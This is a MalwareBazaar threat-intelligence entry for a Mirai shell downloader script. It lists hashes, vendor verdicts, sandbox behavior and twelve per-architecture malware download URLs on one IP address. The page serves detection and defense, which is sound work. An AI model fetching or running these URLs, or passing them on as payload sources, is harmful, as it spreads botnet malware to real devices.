MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b6c474bdc5b5aba2315e1663446e3b07b4efaf8816bfaeef2a85a5a4458c44c6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 7


Intelligence 7 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: b6c474bdc5b5aba2315e1663446e3b07b4efaf8816bfaeef2a85a5a4458c44c6
SHA3-384 hash: c2a85c21fbf0fdcb59879562b242e0af634c74aa65cf8d8fede78e8b6e999b478846099d04512347c35b74b528458604
SHA1 hash: c7add8b7521b00b4efc587914cc39e922579558b
MD5 hash: 6b7bcc091d03df7585ceae5a7677e899
humanhash: seven-aspen-mountain-uncle
File name:w.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:802 bytes
First seen:2025-06-25 19:10:29 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 6:0eEceQ48e0NIl5XeEa0LKiherODOPevIpe6Px8eAf0SXeehFL5i0eScewhanIgem:344NIl5K0LK8DOdlpS1t04Djv
TLSH T1670121CD605556610468DD00B367CE2A5405AEC122800FAD694E0DF26DDFF307F67F8E
Magika txt
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://103.69.96.221/arma39d12ac29f27497f06651e771b7b6e0b4add4f6e69980677e47c50509374139 Miraielf mirai ua-wget
http://103.69.96.221/arm581cec79087ebb457756d9cfb5ffa8a822c6644f0e4aa04006d36bd7d16bae8ee Miraielf mirai ua-wget
http://103.69.96.221/arm62d8e58cb12af842552eb436da561952d27cb1a88681e3b0ceb7b1550c75de064 Miraielf mirai ua-wget
http://103.69.96.221/arm700eabaddd45ec2a5561dceba20946b21a4cb10e83265c18c7c817ea2cfeb3522 Miraielf mirai ua-wget
http://103.69.96.221/m68k804fa47f76786f0859d114609116ea76016af1c31180af810790902f99a4e79f Miraielf mirai ua-wget
http://103.69.96.221/mips856d04f62b520a17ebfb2d178600f7dbed8184cc361043ef2877365d1848b957 Miraielf mirai ua-wget
http://103.69.96.221/mpsl0df808e3fa32fe14334d6057de74b8dcc98a3947e8207d75faa2f7be67b06a0e Miraielf mirai ua-wget
http://103.69.96.221/ppc51f125abc6b45027dd851115caf240cd3bc6ed1a72bcbc66cfd19bdc640b2f89 Miraielf mirai ua-wget
http://103.69.96.221/sh42b69d8c7fd511e88c99ebaa889cf6f7fe4bf00beb8b6106e2b6ea73132128753 Miraielf mirai ua-wget
http://103.69.96.221/spc88c36968a455f9d060c299a047e40b4f8185e2f7808e1eb56e8d55e7c30407c8 Miraielf mirai ua-wget
http://103.69.96.221/x86de0567748097a8ba22759d2876355dfc2a46d4969b00047587a22f2c67ec0065 Miraielf mirai ua-wget
http://103.69.96.221/x86_64872d88be5ab68bd69614c99918a20bc165c3e55b1bbcfd4f75f2cf4bddf1b13c Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
100
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Linux.Downloader-32.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
92.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=685c4a36b06783b9ebd79976linux22vpnfull_triage
Tags:
trojan hype sage
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
lolbin remote
Link:
https://www.filescan.io/uploads/685c4aa53faf8fcd7d4228ea/reports/b7292a21-f55c-4ec9-8cf7-32dc0410ed48/overview
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/12f55cf0-1803-48c4-b87c-b8873ef5147a
Behavior Graph:
Download SVG
%3 guuid=39923e74-1900-0000-8108-d889ec0d0000 pid=3564 /usr/bin/sudo guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569 /tmp/sample.bin guuid=39923e74-1900-0000-8108-d889ec0d0000 pid=3564->guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569 execve guuid=01893976-1900-0000-8108-d889f30d0000 pid=3571 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=01893976-1900-0000-8108-d889f30d0000 pid=3571 execve guuid=56bd1caf-1a00-0000-8108-d889a6110000 pid=4518 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=56bd1caf-1a00-0000-8108-d889a6110000 pid=4518 execve guuid=46cd86af-1a00-0000-8108-d889aa110000 pid=4522 /usr/bin/dash guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=46cd86af-1a00-0000-8108-d889aa110000 pid=4522 clone guuid=53b39eb0-1a00-0000-8108-d889b0110000 pid=4528 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=53b39eb0-1a00-0000-8108-d889b0110000 pid=4528 execve guuid=88d1a530-1b00-0000-8108-d889cf120000 pid=4815 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=88d1a530-1b00-0000-8108-d889cf120000 pid=4815 execve guuid=bb12ea30-1b00-0000-8108-d889d1120000 pid=4817 /usr/bin/dash guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=bb12ea30-1b00-0000-8108-d889d1120000 pid=4817 clone guuid=902bf231-1b00-0000-8108-d889d6120000 pid=4822 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=902bf231-1b00-0000-8108-d889d6120000 pid=4822 execve guuid=5e342eca-1b00-0000-8108-d8896d140000 pid=5229 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=5e342eca-1b00-0000-8108-d8896d140000 pid=5229 execve guuid=6e1381ca-1b00-0000-8108-d8896e140000 pid=5230 /usr/bin/dash guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=6e1381ca-1b00-0000-8108-d8896e140000 pid=5230 clone guuid=a63342cb-1b00-0000-8108-d88970140000 pid=5232 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=a63342cb-1b00-0000-8108-d88970140000 pid=5232 execve guuid=c9b462f8-1c00-0000-8108-d88978140000 pid=5240 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=c9b462f8-1c00-0000-8108-d88978140000 pid=5240 execve guuid=b4ba10fb-1c00-0000-8108-d88979140000 pid=5241 /usr/bin/dash guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=b4ba10fb-1c00-0000-8108-d88979140000 pid=5241 clone guuid=dfbefdfc-1c00-0000-8108-d8897b140000 pid=5243 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=dfbefdfc-1c00-0000-8108-d8897b140000 pid=5243 execve guuid=957a6248-1e00-0000-8108-d8899c140000 pid=5276 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=957a6248-1e00-0000-8108-d8899c140000 pid=5276 execve guuid=aa570149-1e00-0000-8108-d8899d140000 pid=5277 /usr/bin/dash guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=aa570149-1e00-0000-8108-d8899d140000 pid=5277 clone guuid=d812104a-1e00-0000-8108-d8899f140000 pid=5279 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=d812104a-1e00-0000-8108-d8899f140000 pid=5279 execve guuid=04a93dd9-1e00-0000-8108-d889a0140000 pid=5280 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=04a93dd9-1e00-0000-8108-d889a0140000 pid=5280 execve guuid=0759bed9-1e00-0000-8108-d889a1140000 pid=5281 /usr/bin/dash guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=0759bed9-1e00-0000-8108-d889a1140000 pid=5281 clone guuid=f2d3e9da-1e00-0000-8108-d889a3140000 pid=5283 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=f2d3e9da-1e00-0000-8108-d889a3140000 pid=5283 execve guuid=d0be8bd9-2000-0000-8108-d889a4140000 pid=5284 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=d0be8bd9-2000-0000-8108-d889a4140000 pid=5284 execve guuid=b07810da-2000-0000-8108-d889a5140000 pid=5285 /usr/bin/dash guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=b07810da-2000-0000-8108-d889a5140000 pid=5285 clone guuid=a77923db-2000-0000-8108-d889a7140000 pid=5287 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=a77923db-2000-0000-8108-d889a7140000 pid=5287 execve guuid=81e92165-2100-0000-8108-d889a8140000 pid=5288 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=81e92165-2100-0000-8108-d889a8140000 pid=5288 execve guuid=451aa965-2100-0000-8108-d889a9140000 pid=5289 /usr/bin/dash guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=451aa965-2100-0000-8108-d889a9140000 pid=5289 clone guuid=d19eb366-2100-0000-8108-d889ab140000 pid=5291 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=d19eb366-2100-0000-8108-d889ab140000 pid=5291 execve guuid=d0cb2d6e-2200-0000-8108-d889ac140000 pid=5292 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=d0cb2d6e-2200-0000-8108-d889ac140000 pid=5292 execve guuid=1adeac6e-2200-0000-8108-d889ad140000 pid=5293 /usr/bin/dash guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=1adeac6e-2200-0000-8108-d889ad140000 pid=5293 clone guuid=961e346f-2200-0000-8108-d889af140000 pid=5295 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=961e346f-2200-0000-8108-d889af140000 pid=5295 execve guuid=46ab7526-2300-0000-8108-d889b0140000 pid=5296 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=46ab7526-2300-0000-8108-d889b0140000 pid=5296 execve guuid=66cff426-2300-0000-8108-d889b1140000 pid=5297 /usr/bin/dash guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=66cff426-2300-0000-8108-d889b1140000 pid=5297 clone guuid=92b38f27-2300-0000-8108-d889b3140000 pid=5299 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=92b38f27-2300-0000-8108-d889b3140000 pid=5299 execve guuid=601c1d8d-2400-0000-8108-d889b4140000 pid=5300 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=601c1d8d-2400-0000-8108-d889b4140000 pid=5300 execve guuid=0d579e8d-2400-0000-8108-d889b5140000 pid=5301 /home/sandbox/x86 net guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=0d579e8d-2400-0000-8108-d889b5140000 pid=5301 execve guuid=4e80de8d-2400-0000-8108-d889b7140000 pid=5303 /usr/bin/busybox net send-data write-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=4e80de8d-2400-0000-8108-d889b7140000 pid=5303 execve guuid=49bb2c37-2500-0000-8108-d889ba140000 pid=5306 /usr/bin/chmod guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=49bb2c37-2500-0000-8108-d889ba140000 pid=5306 execve guuid=805ea137-2500-0000-8108-d889bb140000 pid=5307 /home/sandbox/x86_64 net guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=805ea137-2500-0000-8108-d889bb140000 pid=5307 execve guuid=0003c237-2500-0000-8108-d889bd140000 pid=5309 /usr/bin/rm delete-file guuid=c24df375-1900-0000-8108-d889f10d0000 pid=3569->guuid=0003c237-2500-0000-8108-d889bd140000 pid=5309 execve 0b3ec34b-8d28-57e8-8182-63c0d711508a 103.69.96.221:80 guuid=01893976-1900-0000-8108-d889f30d0000 pid=3571->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 79B guuid=53b39eb0-1a00-0000-8108-d889b0110000 pid=4528->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 80B guuid=902bf231-1b00-0000-8108-d889d6120000 pid=4822->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 80B guuid=a63342cb-1b00-0000-8108-d88970140000 pid=5232->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 80B guuid=dfbefdfc-1c00-0000-8108-d8897b140000 pid=5243->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 80B guuid=d812104a-1e00-0000-8108-d8899f140000 pid=5279->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 80B guuid=f2d3e9da-1e00-0000-8108-d889a3140000 pid=5283->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 80B guuid=a77923db-2000-0000-8108-d889a7140000 pid=5287->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 79B guuid=d19eb366-2100-0000-8108-d889ab140000 pid=5291->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 79B guuid=961e346f-2200-0000-8108-d889af140000 pid=5295->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 79B guuid=92b38f27-2300-0000-8108-d889b3140000 pid=5299->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 79B e22a25d0-6c98-5792-9e9c-b205c3cd098e 46.3.112.9:53 guuid=0d579e8d-2400-0000-8108-d889b5140000 pid=5301->e22a25d0-6c98-5792-9e9c-b205c3cd098e con guuid=9106d28d-2400-0000-8108-d889b6140000 pid=5302 /home/sandbox/x86 dns net send-data zombie guuid=0d579e8d-2400-0000-8108-d889b5140000 pid=5301->guuid=9106d28d-2400-0000-8108-d889b6140000 pid=5302 clone 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=9106d28d-2400-0000-8108-d889b6140000 pid=5302->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 760B 5a1eed8a-85fe-5cc9-b13b-21dc70289ae4 0.0.0.0:0 guuid=9106d28d-2400-0000-8108-d889b6140000 pid=5302->5a1eed8a-85fe-5cc9-b13b-21dc70289ae4 con guuid=997de88d-2400-0000-8108-d889b8140000 pid=5304 /home/sandbox/x86 guuid=9106d28d-2400-0000-8108-d889b6140000 pid=5302->guuid=997de88d-2400-0000-8108-d889b8140000 pid=5304 clone guuid=4e80de8d-2400-0000-8108-d889b7140000 pid=5303->0b3ec34b-8d28-57e8-8182-63c0d711508a send: 82B guuid=2102f58d-2400-0000-8108-d889b9140000 pid=5305 /home/sandbox/x86 guuid=997de88d-2400-0000-8108-d889b8140000 pid=5304->guuid=2102f58d-2400-0000-8108-d889b9140000 pid=5305 clone guuid=805ea137-2500-0000-8108-d889bb140000 pid=5307->e22a25d0-6c98-5792-9e9c-b205c3cd098e con guuid=0856ba37-2500-0000-8108-d889bc140000 pid=5308 /home/sandbox/x86_64 dns net send-data zombie guuid=805ea137-2500-0000-8108-d889bb140000 pid=5307->guuid=0856ba37-2500-0000-8108-d889bc140000 pid=5308 clone guuid=0856ba37-2500-0000-8108-d889bc140000 pid=5308->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 570B guuid=0856ba37-2500-0000-8108-d889bc140000 pid=5308->5a1eed8a-85fe-5cc9-b13b-21dc70289ae4 con guuid=b119c737-2500-0000-8108-d889be140000 pid=5310 /home/sandbox/x86_64 guuid=0856ba37-2500-0000-8108-d889bc140000 pid=5308->guuid=b119c737-2500-0000-8108-d889be140000 pid=5310 clone guuid=7ee1cb37-2500-0000-8108-d889bf140000 pid=5311 /home/sandbox/x86_64 guuid=b119c737-2500-0000-8108-d889be140000 pid=5310->guuid=7ee1cb37-2500-0000-8108-d889bf140000 pid=5311 clone
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/b6c474bdc5b5aba2315e1663446e3b07b4efaf8816bfaeef2a85a5a4458c44c6
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/b6c474bdc5b5aba2315e1663446e3b07b4efaf8816bfaeef2a85a5a4458c44c6/
Threat name:
Script-Shell.Worm.Mirai
Create hunting rule
Status:
Malicious
First seen:
2025-06-25 18:10:28 UTC
File Type:
Text (Shell)
AV detection:
18 of 38 (47.37%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=w3chjpofwwv2emk6czrui3r3a62o7l4ic27253zkqws2irmmitda._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/250625-xxz6js11cv/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/b6c474bdc5b5aba2315e1663446e3b07b4efaf8816bfaeef2a85a5a4458c44c6

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh b6c474bdc5b5aba2315e1663446e3b07b4efaf8816bfaeef2a85a5a4458c44c6

(this sample)

Mirai

elf a39d12ac29f27497f06651e771b7b6e0b4add4f6e69980677e47c50509374139

  
URLhaus
https://urlhaus.abuse.ch/url/3570116/
  
Delivery method
Distributed via web download
  
Dropping
MD5 5ace74d08c6a4d3f9e1d2d49d27dcbda
  
Dropping
SHA256 a39d12ac29f27497f06651e771b7b6e0b4add4f6e69980677e47c50509374139
  
URLhaus
https://urlhaus.abuse.ch/url/3568991/
  
URLhaus
https://urlhaus.abuse.ch/url/3570319/
  
URLhaus
https://urlhaus.abuse.ch/url/3570333/

Comments